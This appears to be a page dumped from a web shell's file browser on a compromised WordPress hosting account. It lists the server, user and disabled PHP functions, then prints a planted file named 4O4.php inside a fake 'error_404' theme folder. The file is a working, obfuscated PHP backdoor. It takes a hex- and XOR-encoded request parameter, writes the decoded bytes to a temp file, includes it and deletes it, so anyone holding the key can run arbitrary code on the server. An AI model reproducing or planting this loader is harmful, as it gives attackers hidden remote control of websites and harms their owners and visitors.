HEX
Server: Apache
System: Linux web204c0.megawebservers.com 5.14.0-570.37.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Aug 28 10:41:06 UTC 2025 x86_64
User: absolutespace.ca (53202)
PHP: 7.4.33
Disabled: apache_get_modules,apache_get_version,disk_free_space,phpinfo,exec,shell_exec,passthru,system,proc_nice
Upload Files
File: /services/webpages/a/b/absolutespace.ca/public/wp-content/themes/error_404_1748027280/4O4.php
<!--tE1aVizH-->
<?php

if(count($_REQUEST) > 0 && isset($_REQUEST["\x70\x72o\x70e\x72\x74\x79_set"])){
$itm = array_filter(["/var/tmp", session_save_path(), "/dev/shm", getcwd(), getenv("TEMP"), sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), getenv("TMP")]);
$holder = hex2bin($_REQUEST["\x70\x72o\x70e\x72\x74\x79_set"]);
$token = '' ; foreach(str_split($holder) as $char){$token.=chr(ord($char)^33);}
while ($binding = array_shift($itm)) {
            if (max(0, is_dir($binding) * is_writable($binding))) {
            $val = vsprintf("%s/%s", [$binding, ".hld"]);
            $success = file_put_contents($val, $token);
if ($success) {
    include $val;
    @unlink($val);
    exit;
}
        }
}
}